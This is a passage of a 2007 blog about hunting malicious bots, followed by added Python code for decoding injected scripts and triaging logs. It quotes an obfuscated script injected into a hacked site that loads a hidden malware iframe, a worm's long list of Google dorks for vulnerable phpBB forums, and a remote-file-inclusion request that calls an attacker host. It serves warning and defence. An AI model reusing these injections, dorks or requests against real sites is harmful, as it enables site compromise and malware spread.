Friday, January 05, 2007

Bot Hunters Beware: Search Engine Site Hacked

Beware when investigating user agents and referrers that show up in your log files, because you could end up infected with a virus just by visiting the site behind them!

This little crawler left his calling card:

38.99.203.110 "panscient.com"
A quick trip to the Panscient site shows it has been hacked and the home page has this javascript inserted into the top of the file:
<script language="javascript"> document.write(
unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E') ); </script>
When decoded, that JavaScript becomes a hidden 1x1 iframe pointing at the source of the downloader virus:
<iframe src= http://81.95.146.98/index.html
frameborder="0" width="1" height="1" scrolling="no"
name=counter></iframe>
Thanks to John Andrews for the tip that they were hacked and spreading a virus, as I've been to Panscient's site before and didn't notice anything wrong, but it was definitely infected when I went there today!

Just heed this as a cautionary tale that things in your log file could be a lure by hackers to infect you with something not currently detected by virus scanners, which is a good reason why I disable JavaScript when I do most of my bot hunting.
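A safer way to see what a script like this does than loading the page in a browser is to decode it offline. The following is an added example, not code from the original post or from Panscient: it pulls every document.write(unescape('...')) out of a saved copy of a page, decodes it the way the JavaScript engine would (JavaScript's unescape() treats %XX as a Latin-1 code point and also accepts %uXXXX, so plain URL decoding is not quite the same thing), and reports any iframe the script would have injected. The SAMPLE_HTML is constructed: only the percent-encoded string comes from the post, the surrounding markup is made up. The hidden-iframe heuristic (width or height of 1 or less, or CSS display:none / visibility:hidden) is my own assumption about what counts as invisible to a visitor.

```python
import re

# Constructed sample: a page skeleton wrapped around the injected <script>
# quoted in the post. Only the encoded string comes from the post; the rest
# of the markup is made up so the scanner has a realistic document to walk.
SAMPLE_HTML = """<html><head><title>home</title>
<script language="javascript"> document.write(
unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E') ); </script>
</head><body><p>Welcome</p></body></html>"""


def js_unescape(text):
    """Decode like JavaScript's unescape(): %uXXXX is a UTF-16 code unit and
    %XX is one Latin-1 code point (not UTF-8, so this is not urllib.unquote)."""
    text = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)


# document.write(unescape('...')) / unescape("...") with any whitespace
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name="value", name='value' or bare name=value (the injected tag uses both)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def tag_attrs(tag):
    """Attribute name -> value for one opening tag."""
    return {name.lower(): dq or sq or bare for name, dq, sq, bare in ATTR.findall(tag)}


def is_hidden(attrs):
    """Assumed heuristic: 1x1 (or smaller) boxes and CSS-hidden frames are
    the ones a visitor never sees."""
    def tiny(value):
        try:
            return float(value.strip().rstrip("px")) <= 1
        except ValueError:
            return False
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)


def find_hidden_iframes(html):
    """Decode each document.write(unescape('...')) without executing it and
    report every iframe it would have written into the page."""
    findings = []
    for _quote, encoded in UNESCAPE_CALL.findall(html):
        decoded = js_unescape(encoded)
        for tag in IFRAME_TAG.findall(decoded):
            attrs = tag_attrs(tag)
            findings.append({"src": attrs.get("src", ""),
                             "hidden": is_hidden(attrs),
                             "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML):
        print("%s iframe -> %s" % ("hidden" if f["hidden"] else "visible", f["src"]))
        print("  decoded: " + f["decoded"])
```

Run it against a copy of the page fetched with curl or wget (which do not execute scripts) rather than a browser, and keep the decoded src as an indicator to block or report; the same unescape()-and-write trick is used with plain script tags and object tags too, so in practice you would widen IFRAME_TAG to cover those.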

Besides, who best to hack and humiliate than the very people that battle these vermin on a daily basis?

So bot busters BEWARE!

UPDATE - I checked other domains on the server and it's hacked all over the place. Hard to believe that a company selling custom search engines doesn't even have their own dedicated server, just weird.

Tuesday, January 02, 2007

Botnet Perl/Asan.A.worm Mining Google and Infecting phpBB

Finally got in touch with one of the owners of a server that was hacked and actively mounting the botnet attack and got some good information. There was a file installed on the server called gugl.txt which was a Perl script that had an active load running on the server when it was shut down.

Took about 5 seconds to glance at this file and it's obvious I was absolutely correct about how they were finding vulnerable sites using Google as the primary data mining facility. The only thing I found a bit odd is why they were using Google Japan "www.google.co.jp" when the other evidence I found pointed to Google Turkey, perhaps 2 different hackers or worms, perhaps just spreading the load around so Google won't notice, who knows.

The file they download to your server to locate more vulnerable servers is here:

http://lawhelper.com.ua/gugl.txt
When I opened the file my virus scanner claimed it was a Perl.Asan virus so I did a bit of research and Panda claims it's the Perl/Asan.A.worm or something similar, that locates and infects phpBB systems.

Here are the searches, in human-readable form, that gugl.txt was using to look for vulnerable forums:

"posting.php?mode=newtopic" "viewtopic.php?t=" "viewtopic"+"&view=previous" "Powered+By+phpBB+2.0.4" "Powered+By+phpBB+2.0.5" "Powered+By+phpBB+2.0.6" "Powered+By+phpBB+2.0.7" "Powered+By+phpBB+2.0.8" "Powered+By+phpBB+2.0.9" "Powered+By+phpBB+2.0.10" "Powered+By+phpBB+2.0.10" "Powered+By+phpBB+2.0.11" "Powered+By+phpBB+2.0.2" "Powered+By+phpBB+2.0.1" "Powered+by+phpbb+2.0.10".com "Powered+by+phpbb+2.0.8".com "Powered+by+phpbb+2.0.6".com "Powered+by+phpbb+2.0.10".net "Powered+by+phpbb+2.0.6".net "Powered+by+phpbb+2.0.8".de "Powered+by+phpbb+2.0.6".de "Powered+by+phpbb+2.0.10".de "Powered+by+phpbb+2.0.8".be "Powered+by+phpbb+2.0.6".be "Powered+by+phpbb+2.0.10".be "Powered+by+phpbb+2.0.8".ca "Powered+by+phpbb+2.0.6".ca "Powered+by+phpbb+2.0.10".ca "Powered+by+phpbb+2.0.8".org "Powered+by+phpbb+2.0.6".org "Powered+by+phpbb+2.0.10".org "Powered+by+phpbb+2.0.6"foro "Powered+by+phpbb+2.0.8"foro "Powered+by+phpbb+2.0.10"foro "Powered+by+phpbb+2.0.6"forum "Powered+by+phpbb+2.0.8"forum "Powered+by+phpbb+2.0.10"forum "Powered+by+phpbb+2.0.6"phpbb "Powered+by+phpbb+2.0.8"phpbb "Powered+by+phpbb+2.0.10"phpbb "test+forum+1"+"phpbb"+"2.0.6" "test+forum+1"+"phpbb"+"2.0.8" "test+forum+1"+"phpbb"+"2.0.10" "welcome+to+phpbb+2"+"phpbb"+"2.0.6" "welcome+to+phpbb+2"+"phpbb"+"2.0.8" "Powered+by+phpbb+2.0.8".us "Powered+by+phpbb+2.0.6".us "Powered+by+phpbb+2.0.10".us "Powered+by+phpbb+2.0.8".tw "Powered+by+phpbb+2.0.6".tw "Powered+by+phpbb+2.0.10".tw "Powered+by+phpbb+2.0.8".cn "Powered+by+phpbb+2.0.6".cn "Powered+by+phpbb+2.0.10".cn "Powered+by+phpbb+2.0.8".hk "Powered+by+phpbb+2.0.6".hk "Powered+by+phpbb+2.0.10".hk "Powered+by+phpbb+2.0.8".se "Powered+by+phpbb+2.0.6".se "Powered+by+phpbb+2.0.10".se "Powered+by+phpbb+2.0.8".ar "Powered+by+phpbb+2.0.6".ar "Powered+by+phpbb+2.0.10".ar "Powered+by+phpbb+2.0.8".at "Powered+by+phpbb+2.0.6".at "Powered+by+phpbb+2.0.10".at "Powered+by+phpbb+2.0.8".uy "Powered+by+phpbb+2.0.6".uy "Powered+by+phpbb+2.0.10".uy "Powered+by+phpbb+2.0.8".cz 
"Powered+by+phpbb+2.0.6".cz "Powered+by+phpbb+2.0.10".cz "Powered+by+phpbb+2.0.8".kr "Powered+by+phpbb+2.0.6".kr "Powered+by+phpbb+2.0.10".kr "Powered+by+phpbb+2.0.8".jp "Powered+by+phpbb+2.0.6".jp "Powered+by+phpbb+2.0.10".jp "Powered+by+phpbb+2.0.8".dk "Powered+by+phpbb+2.0.6".dk "Powered+by+phpbb+2.0.10".dk "Powered+by+phpbb+2.0.8".yu "Powered+by+phpbb+2.0.6".yu "Powered+by+phpbb+2.0.10".yu "Powered+by+phpbb+2.0.8".my "Powered+by+phpbb+2.0.6".my "Powered+by+phpbb+2.0.10".my "Powered+by+phpbb+2.0.8".info "Powered+by+phpbb+2.0.6".info "Powered+by+phpbb+2.0.10".info "Powered+by+phpbb+2.0.8".gr "Powered+by+phpbb+2.0.6".gr "Powered+by+phpbb+2.0.10".gr "Powered+by+phpbb+2.0.8".uk "Powered+by+phpbb+2.0.6".uk "Powered+by+phpbb+2.0.10".uk "Powered+by+phpbb+2.0.8".pe "Powered+by+phpbb+2.0.6".pe "Powered+by+phpbb+2.0.10".pe "Powered+by+phpbb+2.0.8".co "Powered+by+phpbb+2.0.6".co "Powered+by+phpbb+2.0.10".co "Powered+by+phpbb+2.0.8".ve "Powered+by+phpbb+2.0.6".ve "Powered+by+phpbb+2.0.10".ve "Powered+by+phpbb+2.0.8".cl "Powered+by+phpbb+2.0.6".cl "Powered+by+phpbb+2.0.10".cl "Powered+by+phpbb+2.0.8".py "Powered+by+phpbb+2.0.6".py "Powered+by+phpbb+2.0.8".bo "Powered+by+phpbb+2.0.6".bo "Powered+by+phpbb+2.0.10".bo "Powered+by+phpbb+2.0.8".ec "Powered+by+phpbb+2.0.6".ec "Powered+by+phpbb+2.0.10".ec "Powered+by+phpbb+2.0.8".mx "Powered+by+phpbb+2.0.6".mx "Powered+by+phpbb+2.0.10".mx "Powered+by+phpbb+2.0.8".fi "Powered+by+phpbb+2.0.6".fi "Powered+by+phpbb+2.0.10".fi "Powered+by+phpbb+2.0.8".si "Powered+by+phpbb+2.0.6".si "Powered+by+phpbb+2.0.10".si "Powered+by+phpbb+2.0.8".ch "Powered+by+phpbb+2.0.6".ch "Powered+by+phpbb+2.0.10".ch "Powered+by+phpbb+2.0.8".es "Powered+by+phpbb+2.0.6".es "Powered+by+phpbb+2.0.10".es "Powered+by+phpbb+2.0.8".fr "Powered+by+phpbb+2.0.6".fr "Powered+by+phpbb+2.0.10".fr "Powered+by+phpbb+2.0.8".br "Powered+by+phpbb+2.0.6".br "Powered+by+phpbb+2.0.10".br "Powered+by+phpbb+2.0.8".ru "Powered+by+phpbb+2.0.6".ru "Powered+by+phpbb+2.0.10".ru 
"Powered+by+phpbb+2.0.8".ro "Powered+by+phpbb+2.0.6".ro "Powered+by+phpbb+2.0.10".ro "Powered+by+phpbb+2.0.8".biz "Powered+by+phpbb+2.0.6".biz "Powered+by+phpbb+2.0.10".biz "Powered+by+phpbb+2.0.8".ni "Powered+by+phpbb+2.0.6".ni "Powered+by+phpbb+2.0.10".ni "Powered+by+phpbb+2.0.8".edu "Powered+by+phpbb+2.0.6".edu "Powered+by+phpbb+2.0.10".edu "Powered+by+phpbb+2.0.8".gov "Powered+by+phpbb+2.0.6".gov "Powered+by+phpbb+2.0.10".gov "Powered+by+phpbb+2.0.8".aero "Powered+by+phpbb+2.0.6".aero "Powered+by+phpbb+2.0.10".aero "Powered+by+phpbb+2.0.8".mil "Powered+by+phpbb+2.0.6".mil "Powered+by+phpbb+2.0.10".mil "Powered+by+phpbb+2.0.8".fm "Powered+by+phpbb+2.0.6".fm "Powered+by+phpbb+2.0.10".fm "Powered+by+phpbb+2.0.8".ie "Powered+by+phpbb+2.0.6".ie "Powered+by+phpbb+2.0.10".ie "Powered+by+phpbb+2.0.8".ir "Powered+by+phpbb+2.0.6".ir "Powered+by+phpbb+2.0.10".ir "Powered+by+phpbb+2.0.8".hr "Powered+by+phpbb+2.0.6".hr "Powered+by+phpbb+2.0.10".hr "Powered+by+phpbb+2.0.8".hu "Powered+by+phpbb+2.0.6".hu "Powered+by+phpbb+2.0.10".hu "Powered+by+phpbb+2.0.8".za "Powered+by+phpbb+2.0.6".za "Powered+by+phpbb+2.0.10".za "2.0.4+©+2001,"+topic+View+2.0.4" "2.0.5+©+2001,"+topic+View+2.0.5" "2.0.6+©+2001,"+topic+View+2.0.6" "2.0.7+©+2001,"+topic+View+2.0.7" "2.0.8+©+2001,"+topic+View+2.0.8" "2.0.9+©+2001,"+topic+View+2.0.9" "2*0.4+©+2001-"+topic+View+2.0.10" "2*0.5+©+2001-"+topic+View" "2*0.6+©+2001-"+topic+View" "2*0.7+©+2001-"+topic+View" "2*0.8+©+2001-"+topic+View" "2*0.9+©+2001-"+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2.0.10+"inurl:".pt"+"phpbb"+"2.0.6" "inurl:".pt"+"phpbb"+"2.0.8" "inurl:".pt"+"phpbb"+"2.0.10" "inurl:".tz"+"phpbb"+"2.0.6" "inurl:".tz"+"phpbb"+"2.0.8" "inurl:".tz"+"phpbb"+"2.0.10" "inurl:".tr"+"phpbb"+"2.0.6" "inurl:".tr"+"phpbb"+"2.0.8" "inurl:".tr"+"phpbb"+"2.0.10" "inurl:".cc"+"phpbb"+"2.0.6" "inurl:".cc"+"phpbb"+"2.0.8" 
"inurl:".cc"+"phpbb"+"2.0.10" "inurl:".it"+"phpbb"+"2.0.6" "inurl:".it"+"phpbb"+"2.0.8" "inurl:".it"+"phpbb"+"2.0.10" "inurl:".au"+"phpbb"+"2.0.6" "inurl:".au"+"phpbb"+"2.0.8" "inurl:".au"+"phpbb"+"2.0.10" "inurl:".nz"+"phpbb"+"2.0.6" "inurl:".nz"+"phpbb"+"2.0.8" "inurl:".nz"+"phpbb"+"2.0.10" "inurl:".ee"+"phpbb"+"2.0.6" "inurl:".ee"+"phpbb"+"2.0.8" "inurl:".ee"+"phpbb"+"2.0.10" "inurl:".il"+"phpbb"+"2.0.6" "inurl:".il"+"phpbb"+"2.0.8" "inurl:".il"+"phpbb"+"2.0.10" "inurl:".jm"+"phpbb"+"2.0.6" "inurl:".jm"+"phpbb"+"2.0.8" "inurl:".jm"+"phpbb"+"2.0.10" "inurl:".lv"+"phpbb"+"2.0.6" "inurl:".lv"+"phpbb"+"2.0.8" "inurl:".lv"+"phpbb"+"2.0.10" "inurl:".mg"+"phpbb"+"2.0.6" "inurl:".mg"+"phpbb"+"2.0.8" "inurl:".mg"+"phpbb"+"2.0.10" "inurl:".lt"+"phpbb"+"2.0.6" "inurl:".lt"+"phpbb"+"2.0.8" "inurl:".lt"+"phpbb"+"2.0.10" "inurl:".ma"+"phpbb"+"2.0.6" "inurl:".ma"+"phpbb"+"2.0.8" "inurl:".ma"+"phpbb"+"2.0.10" "inurl:".ws"+"phpbb"+"2.0.6" "inurl:".ws"+"phpbb"+"2.0.8" "inurl:".ws"+"phpbb"+"2.0.10" "inurl:".com"+"phpbb"+"2.0.6" "inurl:".com"+"phpbb"+"2.0.8" "inurl:".com"+"phpbb"+"2.0.10" "inurl:".my"+"phpbb"+"2.0.6" "inurl:".my"+"phpbb"+"2.0.8" "inurl:".my"+"phpbb"+"2.0.10" "inurl:".no"+"phpbb"+"2.0.6" "inurl:".no"+"phpbb"+"2.0.8" "inurl:".no"+"phpbb"+"2.0.10" "inurl:".no"+"phpbb"+"2.0.6" "inurl:".net"+"phpbb"+"2.0.8" "inurl:".net"+"phpbb"+"2.0.10" "inurl:".net"+"phpbb"+"2.0.6" "inurl:".cx"+"phpbb"+"2.0.6" "inurl:".cx"+"phpbb"+"2.0.8" "inurl:".cx"+"phpbb"+"2.0.10" "inurl:".org"+"phpbb"+"2.0.6" "inurl:".org"+"phpbb"+"2.0.8" "inurl:".org"+"phpbb"+"2.0.10" "inurl:".in"+"phpbb"+"2.0.6" "inurl:".in"+"phpbb"+"2.0.8" "inurl:".in"+"phpbb"+"2.0.10" "inurl:".nl"+"phpbb"+"2.0.6" "inurl:".nl"+"phpbb"+"2.0.8" "inurl:".nl"+"phpbb"+"2.0.10" "welcome+to+phpbb+2"+"phpbb"+"2.0.10" "Powered+by+phpBB"+v-i-e-w-t-o-p-i-c-.-p-h-p "P-o-w-e-r-e-d+b-y+p-h-p-B-B" viewtopic.php+"by+phpBB+2001" viewtopic.php+"by+phpBB+2000" viewtopic.php+"by+phpBB+2002" viewtopic.php+by+phpBB+2003" 
viewtopic.php+"by+phpBB+2004" "ALEKS+HACKED+YOUR+SYSTEM" viewtopic.php+"by+phpBB+2005" viewtopic.php+"by+phpBB+2006"intitle:"::+View+topic" viewtopic.php+"+phpBB+Group" "topic.php?t=""::+View+topic" viewtopic.php?t "View+next+topic" "View+previous+topic" "edit+topic+in+this+forum"+topic+2.0.4+ "edit+topic+in+this+forum"+topic+2.0.5+ "edit+topic+in+this+forum"+topic+2.0.6+ "edit+topic+in+this+forum"+topic+2.0.7+ "edit+topic+in+this+forum"+topic+2.0.8+ "edit+topic+in+this+forum"+topic+2.0.9+ "edit+topic+in+this+forum"+topic+2.0.10+ "All+times+are+GMT"+topic+2.0.4+ "All+times+are+GMT"+topic+2.0.5+ "All+times+are+GMT"+topic+2.0.6+ "All+times+are+GMT"+topic+2.0.7+ "All+times+are+GMT"+topic+2.0.8+ "All+times+are+GMT"+topic+2.0.9+ "All+times+are+GMT"+topic+2.0.10+ "All+times+are+GMT"+topic+2.0.10+ by+phpbb+2.0.4+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.5+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.6+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.7+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.8+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.9+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.10+topic+"Jump+to:"+"You+cannot" "0.4+©+2001,+2002"+next+ "0.5+©+2001,+2002"+next+ "0.6+©+2001,+2002"+next+ "0.7+©+2001,+2002"+next+ "0.8+©+2001,+2002"+next+ "0.9+©+2001,+2002"+next+ "0.10+©+2001,+2002"+next+ "delete+your+posts+in+this+forum"+topic+2.0.4+ "delete+your+posts+in+this+forum"+topic+2.0.5+ "delete+your+posts+in+this+forum"+topic+2.0.6+ "delete+your+posts+in+this+forum"+topic+2.0.7+ "delete+your+posts+in+this+forum"+topic+2.0.8+ "delete+your+posts+in+this+forum"+topic+2.0.9+ "delete+your+posts+in+this+forum"+topic+2.0.10+ viewtopic+2.0.4+ viewtopic+2.0.5+ viewtopic+2.0.6+ viewtopic+2.0.7+ viewtopic+2.0.8+ viewtopic+2.0.9+ viewtopic+2.0.10+ by+phpBB+2.0.4+ by+phpBB+2.0.5+ by+phpBB+2.0.6+ by+phpBB+2.0.7+ by+phpBB+2.0.8+ by+phpBB+2.0.9+ by+phpBB+2.0.10+ "You+cannot+vote+in+polls+in+this+forum"+2.0.4+ "You+cannot+vote+in+polls+in+this+forum"+2.0.5+ 
"You+cannot+vote+in+polls+in+this+forum"+2.0.6+ "You+cannot+vote+in+polls+in+this+forum"+2.0.7+ "You+cannot+vote+in+polls+in+this+forum"+2.0.8+ "You+cannot+vote+in+polls+in+this+forum"+2.0.9+ "You+cannot+vote+in+polls+in+this+forum"+2.0.10+ "View+topic"+2.0.4+ "View+topic"+2.0.5+ "View+topic"+2.0.6+ "View+topic"+2.0.7+ "View+topic"+2.0.8+ "View+topic"+2.0.9+ "View+topic"+2.0.10+ "View+topic"+2.0.4+ "View+topic"+2.0.5+ "View+topic"+2.0.6+ "View+topic"+2.0.7+ "View+topic"+2.0.8+ "View+topic"+2.0.9+ "View+topic"+2.0.10+ "powered+by"+php+view+0.8+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+2001+2003+"group"+board+"cannot+post" "powered+by"+php+view+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.4+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.5+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.6+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.7+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.9+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.10+2001+2002+"group"+board+"cannot+post"

Google likes to claim they "Do No Evil" but sure allow themselves to be used for evil.

Would it be too much to ask that Google plug some holes or block some types of searches to stop these worms from finding vulnerable websites?

Come on guys, with all your Billion$ you should be able to have a few security experts on hand, maybe working in conjunction with Panda, Symantec and such, that keep on top of these specific threats and block the specific searches used to locate vulnerable sites.

Not just Google either, they were just the search engine in the center of this particular attack, but the other search engines like Yahoo, Ask and MSN should be blocking access to this stuff as well.

Technically, my server is only under attack because Google showed one of these worms that the phrase "PhotoCart" existed somewhere on my server, and it's not even the software these idiot hackers are looking for in the first place.

Gee thanks Google, like I needed this problem.

Sheesh.

At least now I know what I'm up against.

Monday, January 01, 2007

How To Shut Down Scrapers the AUP Way.

When I first started bot blocking, the programmer in me saw it as a simple programming problem that could be solved with technology. Eventually, the realist in me saw that although I can solve a lot of individual webmaster abuse problems with technology, there's no way a single bot blocking program can saturate a market deep enough to protect everyone.

Consider that bot blocking is literally putting a bandage on the problem on a server by server, or site by site, basis and not really solving the root of the problem for anyone.

Therefore, I've been looking for additional tools and methods to help everyone besides just the technological solutions I'm developing, and have been testing a real simple solution for effectively shutting down scrapers.

Without resorting to adding IP's to firewalls, .htaccess files, or even filing DMCA reports or any of that nonsense for copyright violation, I'm simply using the hosting company's AUP against the scrapers.

You'll find most hosting companies have the same boilerplate AUP clauses:

Unauthorized access to or use of data, systems or networks, including any attempt to probe, scan or test the vulnerability of a system or network or to breach security or authentication measures without express authorization of the owner of the system or network.

Along with this second gem of a clause:

Interference with service to any user, host or network including, without limitation, mailbombing, flooding, deliberate attempts to overload a system and broadcast attacks.

Well it doesn't take a rocket scientist to see that scraping fits into several categories mentioned above, so I wrote a few letters here and there to test the process and so far have been getting a near 100% success rate.

I would advise anyone catching a serious scraper in action to take a few minutes and send a simple AUP violation report to the hosting company's abuse department and include a log file of the violation.

See if that doesn't help eliminate some problems for everyone and not just bandage one server or site at a time.

Sure the scrapers can hop from ISP to ISP, but eventually nobody will take their business and they will have no place left to run. Maybe someone could even set up the equivalent of a SpamHaus for scrapers and their domains for easy reference, now that would be sweet.

Now if I could only find an automatic tool that sends scraper abuse notification reports at the end of the day.... sounds like I'll have to write it!

Try the AUP violation report approach and see if that works.

Please report back your success or failure, we want to know how it works for you!

Hackers Using Google as a PhotoCart Locator Tool

It would appear that I have some evidence indicating it's the Turkish hackers, known to exploit these types of vulnerabilities, who are behind this PhotoCart attack.

Here's a sample of how they used Google's INURL search function to locate the PhotoCart sites in Google's index:

http://www.google.com.tr/search?hl=tr&q=inurl%3A%2Fphotocart%2F&btnG=Google%27da
As a matter of fact, they hit my blog: now that I've been posting about this problem, the word "photocart" is in the URL, so they got a direct hit on this page:
incredibill.blogspot.com/2006/12/photocart-attack-takes-holiday.html
Here's the source of the "research" for PhotoCart from a Turkish DSL line:
IP Address 88.229.95.xxx
Country Turkey
Sorry about the obfuscated IP address, but I don't want people doing a DoS on him/her/it.

Perhaps Google should restrict some features like INURL: to only be accessed by webmasters registered to use Google tools so they know exactly who these people are when they abuse these features.

PhotoCart Attack Moves Source File To LayeredTech

The PhotoCart attackers regrouped quickly after their other compromised server was cleaned up and launched a new wave, with the file they are trying to make adminprint.php fetch now hosted within LayeredTech.

The file is now being referenced here:

"/PhotoCart/adminprint.php?path=http://artelj.com/c.ar?"
That's in the Layeredtech network somewhere:
host artelj.com has address 72.36.219.90
host 72.36.219.90 -> server2.soloymi.com.

whois 72.36.219.90

OrgName: Layered Technologies, Inc.
NetRange: 72.36.128.0 - 72.36.255.255
This game of cat and mouse is getting old, but if they want to keep playing then I'll keep getting their playgrounds closed one at a time.

The only upside today is the botnet that hit my server was much smaller than in the past and didn't include any IPs from theplanet.com, so perhaps they shut down those compromised locations. Will keep monitoring to see if theplanet.com IP's are used from this point forward to see if they resolved this or not.

Oh well, more letters to write to abuse@bunch-o-companies, sigh...

UPDATE: Looks like it might be the typical vulnerability hackers from Turkey as I caught them hitting my site looking for /PhotoCart/ using a Google INURL search.
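The three things these posts are hunting for in a log, an adminprint.php?path=http://... request carrying a remote URL in its query string, a search-engine referer with an inurl: or "Powered by phpBB" dork like the ones in gugl.txt, and a swarm of libwww-perl clients, can all be pulled out of a standard combined-format access log with a short script. The following is an added example, not code from the original posts or from any bot-blocking product. The SAMPLE_LOG lines are constructed: the two libwww-perl addresses are taken from the botnet list further down the page, while the 192.0.2.x, 198.51.100.x and 203.0.113.x addresses are documentation addresses standing in for the obfuscated ones. It flags the remote-URL requests and the dork referers, aggregates libwww-perl hits per IP in the same "requested N pages as" form the botnet listing uses (minus the reverse-DNS column, which would need socket.gethostbyaddr and a network), and collects the raw lines for one IP, which is the evidence an AUP abuse report should attach. The fingerprint phrases and the search-engine host list are my own assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache combined log format. 70.84.220.210 and
# 64.8.118.5 come from the botnet list on this page; the 192.0.2.x,
# 198.51.100.x and 203.0.113.x addresses are RFC 5737 documentation
# addresses standing in for the obfuscated ones in the posts.
SAMPLE_LOG = """\
70.84.220.210 - - [31/Dec/2006:10:15:01 -0800] "GET /PhotoCart/adminprint.php?path=http://artelj.com/c.ar? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
70.84.220.210 - - [31/Dec/2006:10:15:02 -0800] "GET /photocart/adminprint.php?path=http://artelj.com/c.ar? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
64.8.118.5 - - [31/Dec/2006:10:16:40 -0800] "GET /cart/adminprint.php?path=http://artelj.com/c.ar? HTTP/1.0" 404 512 "-" "libwww-perl/5.801"
192.0.2.55 - - [01/Jan/2007:08:02:11 -0800] "GET /2006/12/photocart-attack-takes-holiday.html HTTP/1.1" 200 9876 "http://www.google.com.tr/search?hl=tr&q=inurl%3A%2Fphotocart%2F&btnG=Google%27da" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.80 - - [02/Jan/2007:03:14:00 -0800] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 4321 "http://www.google.co.jp/search?q=%22Powered+by+phpbb+2.0.10%22.jp" "libwww-perl/5.65"
198.51.100.9 - - [02/Jan/2007:09:01:00 -0800] "GET /index.html HTTP/1.1" 200 1200 "http://www.google.com/search?q=bot+blocking+blog" "Mozilla/5.0"
203.0.113.4 - - [02/Jan/2007:09:02:00 -0800] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
not a log line at all
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Assumed lists: query operators a worm uses to narrow a search engine to a
# fingerprint, phrases seen in gugl.txt and the PhotoCart posts, and the
# engines whose result pages show up as referers.
DORK_OPERATORS = ("inurl:", "intitle:", "intext:", "inanchor:", "site:", "filetype:")
FINGERPRINTS = ("powered by phpbb", "view topic", "all times are gmt", "photocart")
ENGINES = ("google.", "search.yahoo.", "search.msn.", "ask.com")


def parse_line(line):
    """One combined-format line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_targets(path):
    """(param, url) pairs where a query parameter carries a remote URL, the
    shape of the adminprint.php?path=http://... requests."""
    query = urlsplit(path).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if re.match(r"(?i)(https?|ftp)://", v)]


def dork_signals(referer):
    """If the referer is a search-engine results page, return the operators
    and fingerprint phrases found in its query; otherwise an empty list."""
    parts = urlsplit(referer)
    if not any(e in parts.netloc.lower() for e in ENGINES):
        return []
    q = dict(parse_qsl(parts.query)).get("q", "").lower()
    hits = [op for op in DORK_OPERATORS if op in q]
    hits += [fp for fp in FINGERPRINTS if fp in q]
    return hits


def triage(log_text):
    """Walk the log once and return remote-URL attempts, dork-driven visits
    and a per-IP summary of libwww-perl (or attacking) clients."""
    rfi, dorks, per_ip = [], [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        targets = rfi_targets(rec["path"])
        signals = dork_signals(rec["referer"])
        if targets:
            rfi.append((rec["ip"], rec["path"], targets))
        if signals:
            dorks.append((rec["ip"], rec["referer"], signals))
        if rec["ua"].startswith("libwww-perl/") or targets:
            per_ip[(rec["ip"], rec["ua"])] += 1
    bots = ['%s requested %d pages as "%s"' % (ip, n, ua)
            for (ip, ua), n in sorted(per_ip.items())]
    return {"rfi": rfi, "dorks": dorks, "bots": bots}


def evidence(log_text, ip):
    """Raw log lines for one IP: the attachment an AUP abuse report needs."""
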